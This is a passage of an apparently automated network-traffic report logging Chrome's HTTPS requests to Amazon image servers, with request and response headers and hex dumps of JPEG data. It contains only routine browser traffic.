                                                                                                                                                                                                        2024-08-15 13:38:04 UTC4892INData Raw: 31 33 31 34 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 68 74 6d 6c 22 3a 22 3c 61 20 64 61 74 61 2d 61 2d 6d 6f 64 61 6c 3d 5c 22 7b 26 71 75 6f 74 3b 75 72 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 2f 61 66 2f 66 65 65 64 62 61 63 6b 2d 66 6f 72 6d 3f 70 6c 3d 25 37 42 25 32 32 61 64 50 6c 61 63 65 6d 65 6e 74 4d 65 74 61 44 61 74 61 25 32 32 25 33 41 25 37 42 25 32 32 61 64 45 6c 65 6d 65 6e 74 49 64 25 32 32 25 33 41 25 32 32 61 70 65 5f 47 61 74 65 77 61 79 5f 64 65 73 6b 74 6f 70 2d 61 64 2d 63 65 6e 74 65 72 2d 31 5f 64 65 73 6b 74 6f 70 5f 70 6c 61 63 65 6d 65 6e 74 25 32 32 25 32 43 25 32 32 70 61 67 65 54 79 70 65 25 32 32 25 33 41 25 32 32 47 61 74 65 77 61 79 25 32 32 25 32 43 25 32 32 70 61 67 65 55 72 6c 25 32 32 25 33 41 25 32 32
                                                                                                                                                                                                        Data Ascii: 1314{"status":"ok","html":"<a data-a-modal=\"{&quot;url&quot;:&quot;/af/feedback-form?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Gateway_desktop-ad-center-1_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22pageUrl%22%3A%22
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        67192.168.2.44982918.165.191.1594434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:03 UTC378OUTGET /images/I/31ihwTsvbBL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: m.media-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC829INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 3695
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: f1ea36af-f705-4b4e-b4c2-d3f5cba56eee
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 07:01:45 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Tue, 12 Sep 2023 23:27:03 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-862,/images/I/31ihwTsvbBL
                                                                                                                                                                                                        Expires: Wed, 10 Aug 2044 07:01:45 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-862 /images/I/31ihwTsvbBL
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Via: 1.1 01c82f5226ffef5f7e654ffdbab24db6.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Miss from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: ZRH55-P1
                                                                                                                                                                                                        X-Amz-Cf-Id: 0nPgYLob2qBE5xLO-DXDqjuiyVVwCbAs92i_cY-BqMG7_-74dIs9IQ==
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC3695INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 01 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 05 07 02 04 06 03 01 08 09 01 01 00 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fd 96 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"4


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        68192.168.2.449844151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC683OUTGET /images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-OTg1MGY5MmMt-w186._SY116_CB642007527_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 4015
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: 5f060a93-ca57-4828-95da-ed9a000ed89f
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Mon, 06 Sep 2021 13:15:56 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Wed, 26 Aug 2043 21:30:19 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 199955
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:04 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kiad7000055-IAD, cache-ewr-kewr1740035-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 06 06 06 06 07 06 07 08 08 07 0a 0b 0a 0b 0a 0f 0e 0c 0c 0e 0f 16 10 11 10 11 10 16 22 15 19 15 15 19 15 22 1e 24 1e 1c 1e 24 1e 36 2a 26 26 2a 36 3e 34 32 34 3e 4c 44 44 4c 5f 5a 5f 7c 7c a7 01 06 06 06 06 07 06 07 08 08 07 0a 0b 0a 0b 0a 0f 0e 0c 0c 0e 0f 16 10 11 10 11 10 16 22 15 19 15 15 19 15 22 1e 24 1e 1c 1e 24 1e 36 2a 26 26 2a 36 3e 34 32 34 3e 4c 44 44 4c 5f 5a 5f 7c 7c a7 ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 06 07 04 05 08 03 02 01 01 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 02 03 01 04 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ea 00 00 00 8f 12 16 9f dc d8 b5 7a 72
                                                                                                                                                                                                        Data Ascii: JFIF""$$6*&&*6>424>LDDL_Z_||""$$6*&&*6>424>LDDL_Z_||t"5zr
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC1378INData Raw: 23 6d 6e 1e af f5 0c b5 d0 76 df 0d 8d 1b d2 2c a5 d5 b6 13 70 97 33 07 59 4e 74 83 53 4b 55 56 f9 09 06 33 46 90 9f f9 ed 7a fb 79 9e 34 6b 8c 8a 31 3b f4 10 30 f8 91 9b d4 6d d4 9c 7c a8 df a1 ca ba 9b 59 34 4e 56 a3 de 89 5d 5f 2d ea c4 73 9c 9a 83 5e 95 37 50 e5 1d dd 80 09 55 cd 99 24 86 73 5f 1e d5 59 20 26 6c 45 62 11 f5 f9 42 47 e8 e9 e2 79 83 03 27 40 27 4b 31 88 a2 95 19 d5 28 16 90 6d 9a f9 d5 8e 74 74 04 36 35 66 48 09 cc 54 14 74 10 a0 cb 07 cc b5 61 f1 99 df da c8 65 ac 49 21 27 87 dd 22 4d 9d 28 4a 46 44 0f 01 74 e7 b8 2d 24 21 a3 64 52 06 4f af 5d 03 1b 63 15 3d 35 9b 05 63 48 a2 63 17 aa b2 74 8e dc 39 ad 72 5b cb 20 a8 0d 3f ca 3f ad a5 9d c0 ca fe e3 b2 62 41 97 64 d3 45 46 1a d4 ba ae b4 c8 bc 80 d8 c0 58 bb 5e 7e ef a4 75 70 2c 5a 8f
                                                                                                                                                                                                        Data Ascii: #mnv,p3YNtSKUV3Fzy4k1;0m|Y4NV]_-s^7PU$s_Y &lEbBGy'@'K1(mtt65fHTtaeI!'"M(JFDt-$!dRO]c=5cHct9r[ ??bAdEFX^~up,Z
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC1259INData Raw: 10 6a 78 3c 01 0a 38 cc 02 c1 89 24 57 c7 b5 74 07 52 f4 24 55 82 42 ea c0 a5 85 de ec 68 85 12 3e 4c c5 f1 e5 f6 a8 cd f9 1f 2d 34 68 19 bf d6 d5 d4 f3 26 85 6f b5 1b 03 ec 15 a8 8d 8e 18 5d 8b 26 dc fa 53 2a 88 60 58 31 68 c8 e6 4b e5 c5 7a bb f8 6d 81 40 aa 7e c0 3d ca f5 3d 6b 16 01 d3 81 3d 2c b4 02 da 56 1e 22 ed ce cb b7 3a c1 47 d6 5a 11 28 1d c8 42 45 09 01 94 78 40 89 16 d6 20 6f b5 2a 90 02 ad bd a4 91 5e 39 e1 be e7 63 e5 e1 66 e7 b0 b9 df 60 6b 2b 2f ed 4e ff 00 7a 82 29 80 f1 18 4a 0e 07 a8 02 db fd 21 27 ff 00 85 01 c4 6d 62 05 2c 6c 62 8a e3 39 ed db da 68 5d 48 cd 58 12 77 1b 81 fb bd aa 55 52 c5 30 21 6e d6 df 21 c8 5c 52 33 97 64 68 c3 25 b8 4a 39 28 32 ee a5 6e 28 3b 17 84 ea 41 91 54 b9 07 8d 45 98 81 c4 3b 8b 01 49 a4 26 1d 4e a1 cc
                                                                                                                                                                                                        Data Ascii: jx<8$WtR$UBh>L-4h&o]&S*`X1hKzm@~==k=,V":GZ(BEx@ o*^9cf`k+/Nz)J!'mb,lb9h]HXwUR0!n!\R3dh%J9(2n(;ATE;I&N


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        69192.168.2.449846151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC742OUTGET /images/G/39/Electronics/Store/Allelyn2022/BAU/xcm_banners_2022_mena_mobilemania_qc-372x232-product-badge-3lpvr-noc3q_372x232_ae-en._SY116_CB608574218_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 3774
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: 05c565a8-a66a-4470-9977-b0847155b61d
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Wed, 28 Sep 2022 13:34:11 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Wed, 23 Sep 2043 19:58:49 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 799914
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:04 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kjyo7100070-IAD, cache-ewr-kewr1740062-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 86 00 01 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 08 04 06 07 05 02 01 09 10 00 02 01 03 02 04 02 09 03 02 07 01 01 00 00 00 01 02 03 00 04 11 05 12 06 13 21 31 14 22 07 23 33 41 53 73 92 b2 d1 32 51 61 42 a2 24 43 62 71 81 91
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1"#3ASs2QaB$Cbq
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC1378INData Raw: 4e 8e e8 f2 2b 49 39 fd 24 aa ae 14 a2 46 ce 87 09 22 f7 52 0e e5 39 07 c6 b7 bc 92 ea 66 d8 d2 19 e6 98 17 3b e3 84 03 27 94 90 70 8a ac dd 46 ef d0 ca 40 60 0d 7c da cd 2c 11 ca b6 f2 32 c2 52 40 f8 91 62 77 57 c2 ba 2a ff 00 a8 e3 74 2d 9c 85 ca f4 eb 53 3c 6d dc 4d e3 db a5 1e 27 d4 b4 a9 60 d5 f4 e9 a2 86 cf 9d e4 82 05 22 18 04 7b 37 0f 0c cf ba 28 ae 0e 0c 8c ac 86 6c b6 4f 54 ab 31 c0 be 93 6d 38 a6 38 c4 80 5b cd 2c 85 62 52 cb 89 fc a1 c1 50 18 95 62 33 e5 ff 00 41 ec 72 a2 99 69 3a c4 f6 32 78 f8 5c 2a 5a 46 76 24 97 1d 5c b7 f8 79 04 49 84 ce f4 24 08 8e 1e 34 3d 0f 40 6b 36 c2 c2 0b f9 ac a4 b0 31 78 b2 8e cf 0b ba 88 1c ab 0c 98 9a 51 14 71 92 80 64 33 b9 63 95 20 0d c0 c5 ce 3d f4 ab c7 3e b5 2f e8 61 18 38 34 aa f5 a0 7a 58 b7 e1 7b 54 d2
                                                                                                                                                                                                        Data Ascii: N+I9$F"R9f;'pF@`|,2R@bwW*t-S<mM'`"{7(lOT1m88[,bRPb3Ari:2x\*ZFv$\yI$4=@k61xQqd3c =>/a84zX{T
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC1018INData Raw: 8d b7 67 41 ba 36 00 95 92 de 48 fa a4 aa c6 17 4a eb 1f 0f 84 cf aa a8 98 6a 56 5c 43 04 71 41 e1 e3 71 76 c0 ac d7 8e c6 5e 52 76 cc 28 bb 7a ec 19 66 66 62 49 21 71 5b 4f 11 f0 fd d6 87 6c ab 6d 7c b3 e9 fa 90 f2 ce 9b 95 6e 44 0c 08 59 61 24 b2 34 52 1c 64 e5 94 9c 03 d5 ab 4d b6 75 8e 78 12 db fc 44 ac c0 32 b2 ec 5d ef d0 00 f9 f3 64 9e a4 ec ea 43 74 c3 56 fb a3 df 5c f0 b4 f7 d6 d9 86 49 c9 22 ff 00 4d 72 92 db 5e 28 06 42 16 55 25 04 91 86 c6 d5 ea ae 0e 3f a9 4e 71 c4 6e 72 8b 8f 7e ff 00 48 ca 26 6a a1 ad da ea 72 58 5c 4e dc 3e 27 62 20 2d 24 8d 18 96 5b 7c 0c 4a ec c8 18 32 c3 fa d2 60 11 a2 af 68 68 d6 ba d4 d0 1d 0a 1e 5d e9 0c fe 05 25 2d 18 16 e8 09 78 5d 88 69 1e 52 4b a2 a9 06 3d ae 00 e8 8c 7d b5 e1 eb 6b cc 6a 9a 4e ab 15 8c 19 c4 db
                                                                                                                                                                                                        Data Ascii: gA6HJjV\CqAqv^Rv(zffbI!q[Olm|nDYa$4RdMuxD2]dCtV\I"Mr^(BU%?Nqnr~H&jrX\N>'b -$[|J2`hh]%-x]iRK=}kjN


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        70192.168.2.449845151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC736OUTGET /images/G/39/Electronics/Store/Allelyn2022/BAU/xcm_banners_2022_mena_mobilemania_qc-372x232-product-badge-uw1qk_372x232_ae-en._SY116_CB608574221_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 2441
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: f9445a80-7379-4acb-aaf7-4cd4c846632c
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Wed, 28 Sep 2022 13:34:06 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Wed, 23 Dec 2043 09:03:15 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 1738007
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:04 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kiad7000059-IAD, cache-ewr-kewr1740034-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 97 00 01 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 03 04 08 02 05 07 06 01 10 00 02 02 00 01 06 0d 03 03 03 05 01 00 00 00 00 01 02 00 03 04 05 11 12 21 31 92 06 07 14 22 33 41 51 53 71 73 91 b2 d1 13 42 61 23 72 b1 52 a1 a2 32 43
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1"3AQSqsBa#rR2C
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC1063INData Raw: 44 04 44 40 8e 1b a2 a7 cb 4f 68 96 91 c3 74 54 f9 69 ed 12 d0 11 11 01 11 10 13 56 38 ee ca 86 ec bb 81 c2 03 9d 30 b8 4f 47 c4 b1 63 ec 49 b4 f3 4a 78 d2 b0 dd c2 7c b2 dd dd d5 01 e1 5d 48 92 1c f6 d6 3d 7d 16 3d 2f 1e f9 75 bf c3 de 7c d2 75 f8 9f f2 e7 7f f6 64 ac c5 d2 07 33 8d 84 0f ef b3 e0 f8 cb 33 fd 34 67 cd 9f 44 13 9b c2 57 6d d9 45 75 3a 8f 9b 31 73 f5 1c c7 a8 ed cd 29 7b 56 ee e6 9a fe 92 13 cd a8 3b 58 10 76 69 b6 77 6f 13 3e da ce 2f b1 95 dc 6b fa d5 14 d2 20 58 74 d5 88 1a f3 84 d1 2b f8 04 d9 a1 a7 9a b2 e1 ce 8c e2 fc 00 c6 56 ff 00 a9 7d 22 ad 7f ac ba 76 10 bc ec cc c8 13 3a 83 a3 ac 92 02 9e 66 72 f9 90 e7 f9 6c 9f 06 bc f5 6e 1e e2 dd fe 7e af 80 61 31 5f 56 be c9 da 63 f0 6f 82 be ec 3d b9 b4 e9 76 56 d1 3a 4a 4a ff 00 49 d5 9c
                                                                                                                                                                                                        Data Ascii: DD@OhtTiV80OGcIJx|]H=}=/u|ud334gDWmEu:1s){V;Xviwo>/k Xt+V}"v:frln~a1_Vco=vV:JJI


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        71192.168.2.449843151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC695OUTGET /images/G/39/Electronics/Store/Allelyn2022/BAU/xcm_banners_dqc-storage_372x232_ae-en._SY116_CB608574222_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 1513
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: f3abc5e7-8d7e-411b-82f4-731541d714e6
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Wed, 28 Sep 2022 13:34:06 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Mon, 15 Feb 2044 08:57:50 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 861426
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:04 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kiad7000166-IAD, cache-ewr-kewr1740048-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 77 00 01 01 00 02 02 03 01 00 00 00 00 00 00 00 00 00 00 03 04 09 07 08 02 05 06 01 10 00 01 03 01 04 06 08 03 08 03 00 00 00 00 00 00 00 01 02 03 04 05 11 33 73 06 14 53 92 b2 d1 07 08 12 35 72 74 b1 b3 21 24 34 13 31 32 42 51 52 71 91
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"w3sS5rt!$412BQRq
